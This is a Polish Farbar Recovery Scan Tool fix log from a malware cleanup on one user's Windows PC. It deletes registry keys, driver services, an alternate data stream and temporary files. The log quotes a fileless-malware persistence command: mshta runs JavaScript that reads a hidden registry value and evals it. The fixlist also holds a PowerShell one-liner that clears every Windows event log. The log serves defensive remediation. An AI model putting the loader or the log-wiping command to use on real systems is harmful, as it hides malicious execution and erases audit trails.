Rezultat naprawy Farbar Recovery Scan Tool (x64) Wersja: 12.02.2018 Uruchomiony przez Kamil (12-02-2018 22:39:57) Run:1 Uruchomiony z C:\Users\Kamil\Downloads Załadowane profile: Kamil (Dostępne profile: Kamil) Tryb startu: Normal ============================================== fixlist - zawartość: ***************** CloseProcesses: CreateRestorePoint: HKU\.DEFAULT\Software\Classes\7c7c: "C:\Windows\system32\mshta.exe" "javascript:B4aiH="jO";f4V3=new ActiveXObject("WScript.Shell");DGfa2RQ1="Wr5ul6";bOPA04=f4V3.RegRead("HKCU\\software\\wkxl\\pift");lku2oHlD="2";eval(bOPA04);eQ0yj4="2VWz";" <==== UWAGA ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku AlternateDataStreams: C:\ProgramData\TEMP:B755D674 [352] S3 VGPU; System32\drivers\rdvgkmd.sys [X] S4 xhunter1; \??\C:\Windows\xhunter1.sys [X] C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\HDD Regenerator.lnk C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\Readme.lnk C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common DesktopDirectory%\HDD Regenerator.lnk DeleteKey: HKCU\Software\Mozilla DeleteKey: HKCU\Software\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Mozilla DeleteKey: HKLM\SOFTWARE\MozillaPlugins DeleteKey: HKLM\SOFTWARE\Wow6432Node\Mozilla DeleteKey: HKLM\SOFTWARE\Wow6432Node\mozilla.org DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins C:\Users\Kamil\AppData\Local\Mozilla C:\Users\Kamil\AppData\Roaming\Mozilla C:\Users\Kamil\AppData\Roaming\Profiles VirusTotal: C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: ***************** Procesy zostały pomyślnie zamknięte. Punkt przywracania został pomyślnie utworzony. "HKU\.DEFAULT\Software\Classes\7c7c" => pomyślnie usunięto "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00asw" => pomyślnie usunięto HKLM\Software\Classes\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => klucz nie znaleziono C:\ProgramData\TEMP => ":B755D674" ADS pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\VGPU" => pomyślnie usunięto VGPU => serwis pomyślnie usunięto "HKLM\System\CurrentControlSet\Services\xhunter1" => pomyślnie usunięto xhunter1 => serwis pomyślnie usunięto C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\HDD Regenerator.lnk => pomyślnie przeniesiono C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common StartMenu%\Programmi\HDD Regenerator\Readme.lnk => pomyślnie przeniesiono C:\Users\Kamil\AppData\Roaming\VOS\HDDRegenerator\%Common DesktopDirectory%\HDD Regenerator.lnk => pomyślnie przeniesiono HKCU\Software\Mozilla => klucz nie znaleziono "HKCU\Software\MozillaPlugins" => pomyślnie usunięto HKLM\SOFTWARE\Mozilla => klucz nie znaleziono HKLM\SOFTWARE\MozillaPlugins => klucz nie znaleziono HKLM\SOFTWARE\Wow6432Node\Mozilla => klucz nie znaleziono HKLM\SOFTWARE\Wow6432Node\mozilla.org => klucz nie znaleziono "HKLM\SOFTWARE\Wow6432Node\MozillaPlugins" => pomyślnie usunięto "C:\Users\Kamil\AppData\Local\Mozilla" => nie znaleziono "C:\Users\Kamil\AppData\Roaming\Mozilla" => nie znaleziono "C:\Users\Kamil\AppData\Roaming\Profiles" => nie znaleziono VirusTotal: C:\Windows\SysWOW64\Drivers\U3sHlpDr.sys => https://www.virustotal.com/file/687edede5db4b1c12f8ea7ff23e2625a2a6990e66de4f90c31b87304d0ecadc9/analysis/1493076073/ ========= wevtutil el | Foreach-Object {wevtutil cl "$_"} ========= ========= Koniec Powershell: ========= =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 81871072 B Java, Flash, Steam htmlcache => 43293431 B Windows/system/drivers => 952760 B Edge => 0 B Chrome => 691513247 B Firefox => 0 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 83592 B systemprofile32 => 82830 B LocalService => 66228 B NetworkService => 66228 B Kamil => 34977815 B RecycleBin => 3592143 B EmptyTemp: => 824.8 MB danych tymczasowych Usunięto. ================================ System wymagał restartu. ==== Koniec Fixlog 22:40:56 ====